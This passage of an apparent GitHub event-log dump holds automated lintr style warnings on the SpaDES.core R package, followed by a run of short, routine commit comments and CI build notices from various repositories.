^\n```\n[R/downloadData.R:266:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-18T15:50:13Z"}
{"id":"7983876664","type":"CommitCommentEvent","actor":{"login":"idimon4uk"},"repo":{"name":"idimon4uk/python-trezor"},"payload":{"comment":{"id":29751837,"position":16,"line":591,"path":"trezorctl","commit_id":"9fe50108b7b97657b01ceebad9380d2d09384a22","created_at":"2018-07-18T15:50:42Z","updated_at":"2018-07-18T15:50:42Z","author_association":"OWNER","body":"Yes, but in other case value of this fields will be None, and It does not affect the work of device"}},"created_at":"2018-07-18T15:50:42Z"}
{"id":"7983895905","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29751871,"position":null,"line":null,"path":null,"commit_id":"95120debd579853ba96d8c0324b61fd8145969ed","created_at":"2018-07-18T15:53:57Z","updated_at":"2018-07-18T15:53:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make a way to delete an existing note](https://trello.com/c/u5VWRghr/9-make-a-way-to-delete-an-existing-note)"}},"created_at":"2018-07-18T15:53:57Z"}
{"id":"7983898082","type":"CommitCommentEvent","actor":{"login":"SuporteRemarca"},"repo":{"name":"SuporteRemarca/Vers-es-PDV"},"payload":{"comment":{"id":29751873,"position":null,"line":null,"path":null,"commit_id":"4e87f6d6f45bbd437f5c9f1301484ea6f115ee07","created_at":"2018-07-18T15:54:19Z","updated_at":"2018-07-18T15:54:19Z","author_association":"OWNER","body":"Redução do código, tirando o PAF-ECF"}},"created_at":"2018-07-18T15:54:19Z"}
{"id":"7983902316","type":"CommitCommentEvent","actor":{"login":"idimon4uk"},"repo":{"name":"idimon4uk/python-trezor"},"payload":{"comment":{"id":29751883,"position":31,"line":86,"path":"trezorlib/tx_api.py","commit_id":"9fe50108b7b97657b01ceebad9380d2d09384a22","created_at":"2018-07-18T15:55:01Z","updated_at":"2018-07-18T15:55:01Z","author_association":"OWNER","body":"This part of code was discussed with matejcik in gitter chat. He approved this part"}},"created_at":"2018-07-18T15:55:01Z"}
{"id":"7983907077","type":"CommitCommentEvent","actor":{"login":"idimon4uk"},"repo":{"name":"idimon4uk/python-trezor"},"payload":{"comment":{"id":29751890,"position":39,"line":114,"path":"trezorlib/tx_api.py","commit_id":"9fe50108b7b97657b01ceebad9380d2d09384a22","created_at":"2018-07-18T15:55:49Z","updated_at":"2018-07-18T15:55:49Z","author_association":"OWNER","body":"No, result of o.script_pubkey[-1] will be 180 :)\r\n"}},"created_at":"2018-07-18T15:55:49Z"}
{"id":"7983914956","type":"CommitCommentEvent","actor":{"login":"GuaiYiHu"},"repo":{"name":"Wzedlare/android_device_xiaomi_gucci"},"payload":{"comment":{"id":29751895,"position":null,"line":null,"path":null,"commit_id":"1166f0c0c396ba2b5b2d900c228f68bdedb2e2d8","created_at":"2018-07-18T15:57:07Z","updated_at":"2018-07-18T15:57:07Z","author_association":"NONE","body":"Fixed almost all the things with the prebuilt kernel.\r\nSome patches should be applied to the kernel to fix the hw decoders.\r\nThe good news is that the kernel source for gucci will be updated in a few days.\r\nThanks to your tree!\r\nHere is my tree.\r\nhttps://github.com/GuaiYiHu/android_device_xiaomi_gucci"}},"created_at":"2018-07-18T15:57:07Z"}
{"id":"7983918812","type":"CommitCommentEvent","actor":{"login":"Alveel"},"repo":{"name":"ejmg/an-idiots-guide-to-installing-arch-on-a-lenovo-carbon-x1-gen-6"},"payload":{"comment":{"id":29751905,"position":8,"line":97,"path":"README.org","commit_id":"0286bf48e30c505393b38a5d60eefbccbf75e24d","created_at":"2018-07-18T15:57:45Z","updated_at":"2018-07-18T15:57:45Z","author_association":"NONE","body":"The problem with doing the `-Sy` thing is that it teaches wrong behaviour. Doing it right from the start 100% prevents problems from occurring down the line."}},"created_at":"2018-07-18T15:57:45Z"}
{"id":"7983921755","type":"CommitCommentEvent","actor":{"login":"idimon4uk"},"repo":{"name":"idimon4uk/python-trezor"},"payload":{"comment":{"id":29751910,"position":32,"line":619,"path":"trezorctl","commit_id":"9fe50108b7b97657b01ceebad9380d2d09384a22","created_at":"2018-07-18T15:58:15Z","updated_at":"2018-07-18T15:58:15Z","author_association":"OWNER","body":"The same answer here\r\n"}},"created_at":"2018-07-18T15:58:15Z"}
{"id":"7983929704","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29751922,"position":null,"line":null,"path":null,"commit_id":"7efd841f57233ad53f30ddb7de83a1144a78a5b5","created_at":"2018-07-18T15:59:34Z","updated_at":"2018-07-18T15:59:34Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/107"}},"created_at":"2018-07-18T15:59:34Z"}
{"id":"7983930380","type":"CommitCommentEvent","actor":{"login":"JohnnyCrazy"},"repo":{"name":"JohnnyCrazy/SpotifyAPI-NET"},"payload":{"comment":{"id":29751926,"position":null,"line":null,"path":null,"commit_id":"023520d3de18c202e00989c21d7046da9a2706bc","created_at":"2018-07-18T15:59:41Z","updated_at":"2018-07-18T15:59:41Z","author_association":"OWNER","body":"Update your VS @hfz-r , this are new C# features ;)"}},"created_at":"2018-07-18T15:59:41Z"}
{"id":"7983930503","type":"CommitCommentEvent","actor":{"login":"mineo"},"repo":{"name":"metabrainz/picard"},"payload":{"comment":{"id":29751927,"position":null,"line":null,"path":null,"commit_id":"ead7d72ba86f2d5a3b384ab0ee403beeb7873c21","created_at":"2018-07-18T15:59:42Z","updated_at":"2018-07-18T15:59:42Z","author_association":"MEMBER","body":"Can we move this tap from your personal account to metabrainz?"}},"created_at":"2018-07-18T15:59:42Z"}
{"id":"7983932687","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29751944,"position":null,"line":null,"path":null,"commit_id":"043101c15f5b89f5a8b30219abaeaef5cb7456b9","created_at":"2018-07-18T16:00:04Z","updated_at":"2018-07-18T16:00:04Z","author_association":"COLLABORATOR","body":"Agree ;)"}},"created_at":"2018-07-18T16:00:04Z"}
{"id":"7983933783","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29751963,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-18T16:00:15Z","updated_at":"2018-07-18T16:00:15Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 45](https://teamcity.otenv.com/viewLog.html?buildId=8956859&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) is now running\n"}},"created_at":"2018-07-18T16:00:15Z"}
{"id":"7983933793","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29751964,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-18T16:00:15Z","updated_at":"2018-07-18T16:00:15Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 45](https://teamcity.otenv.com/viewLog.html?buildId=8956859&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-18T16:00:15Z"}
{"id":"7983933916","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29751965,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-18T16:00:16Z","updated_at":"2018-07-18T16:00:16Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 46](https://teamcity.otenv.com/viewLog.html?buildId=8957023&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) is now running\n"}},"created_at":"2018-07-18T16:00:16Z"}
